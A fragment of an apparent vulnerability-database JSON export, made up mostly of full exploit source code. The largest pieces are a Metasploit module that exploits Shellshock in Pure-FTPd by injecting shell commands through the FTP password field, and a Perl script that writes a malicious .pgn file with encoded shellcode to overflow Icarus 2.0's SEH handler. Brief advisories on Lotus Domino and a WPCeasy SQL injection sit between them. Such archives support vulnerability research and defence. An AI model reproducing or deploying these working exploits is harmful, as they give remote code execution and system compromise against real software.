"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36504/"}, {"lastseen": "2016-02-04T00:05:34", "bulletinFamily": "exploit", "description": "Pure-FTPd External Authentication Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7...", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "id": "EDB-ID:34862", "href": "https://www.exploit-db.com/exploits/34862/", "type": "exploitdb", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Ftp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',\r\n 'Description' => %q(\r\n This module exploits the code injection flaw known as shellshock which\r\n leverages specially crafted environment variables in Bash. This exploit\r\n specifically targets Pure-FTPd when configured to use an external\r\n program for authentication.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'Frank Denis', # Discovery of Pure-FTPd attack vector\r\n 'Spencer McIntyre' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 2048\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ],\r\n [ 'Linux x86_64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86_64,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'))\r\n register_options(\r\n [\r\n Opt::RPORT(21),\r\n OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])\r\n ], self.class)\r\n deregister_options('FTPUSER', 'FTPPASS')\r\n end\r\n\r\n def check\r\n # this check method tries to use the vulnerability to bypass the login\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n random_id = (rand(100) + 1)\r\n command = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\"\r\n if send_command(username, command) =~ /^2\\d\\d ok./i\r\n return CheckCode::Safe if banner !~ /pure-ftpd/i\r\n disconnect\r\n\r\n command = \"echo auth_ok:0; echo end\"\r\n if send_command(username, command) =~ /^5\\d\\d login authentication failed/i\r\n return CheckCode::Vulnerable\r\n end\r\n end\r\n disconnect\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def execute_command(cmd, _opts)\r\n cmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\")\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n send_command(username, cmd)\r\n end\r\n\r\n def exploit\r\n # Cannot use generic/shell_reverse_tcp inside an elf\r\n # Checking before proceeds\r\n if generate_payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\")\r\n end\r\n\r\n execute_cmdstager(linemax: 500)\r\n handler\r\n end\r\n\r\n def send_command(username, cmd)\r\n cmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\"\r\n connect\r\n send_user(username)\r\n password_result = send_pass(cmd)\r\n disconnect\r\n password_result\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34862/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "User-supplied network file is used for stored user's credentials during TCP/2050 service authentication.", "modified": "2011-03-23T00:00:00", "published": "2011-03-23T00:00:00", "id": "SECURITYVULNS:VULN:11514", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11514", "title": "IBM Lotus Domino Server Controller unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nWPCeasy Admin Logon SQL Injection Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA18945\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/18945/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nManipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nWPCeasy\r\nhttp://secunia.com/product/8156/\r\n\r\nDESCRIPTION:\r\nmurfie has reported a vulnerability in WPCeasy, which can be\r\nexploited by malicious people to conduct SQL injection attacks.\r\n\r\nInput passed to the "uid" and "pwd" parameters in admin.asp isn't\r\nproperly sanitised before being used in a SQL query. This can be\r\nexploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nSuccessful exploitation allows bypassing of authentication to the\r\nadmin page.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nmurfie\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-02-20T00:00:00", "published": "2006-02-20T00:00:00", "id": "SECURITYVULNS:DOC:11514", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11514", "title": "[SA18945] WPCeasy Admin Logon SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-02-20T00:00:00", "published": "2006-02-20T00:00:00", "id": "SECURITYVULNS:VULN:5799", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5799", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-02-07T01:22:33", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-11-17T00:00:00", "published": "2009-11-17T00:00:00", "id": "1337DAY-ID-8156", "href": "https://0day.today/exploit/description/8156", "type": "zdt", "title": "Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)", "sourceData": "====================================================================\r\nIcarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)\r\n====================================================================\r\n\r\n\r\n\r\n# Title: Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: D3V!L FUCK3R\r\n# Published: 2009-11-17\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n#!/user/bin/perl\r\n#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)\r\n#tested on win SP2\r\n#Author: germaya_x & D3v!LFUCK3R \r\n#Download :http://www.randomsoftware.com/pub/icarus.exe\r\n#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)\r\n#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :)\r\n#############################################################\r\nmy $bof=\"A\" x 332 ;\r\nmy $NEXT_sEh=\"\\xEB\\x06\\x90\\x90\";\r\nmy $SEH=\"\\x3F\\xB2\\x2E\\x66\";#hnetcfg.DLL\r\nmy $nop=\"\\x90\" x 20;\r\nmy $sec=\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x47\".\r\n\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x58\\x46\\x43\\x4b\\x38\".\r\n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x44\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x48\".\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x58\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\".\r\n\"\\x42\\x4c\\x46\\x36\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x48\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x48\\x4a\\x56\\x4e\\x33\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x36\\x4a\\x59\".\r\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x56\".\r\n\"\\x4e\\x56\\x43\\x46\\x42\\x30\\x5a\";\r\n###################################################################\r\nopen(myfile,'>> exploit.pgn');\r\nprint myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;\r\n###################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8156"}]}
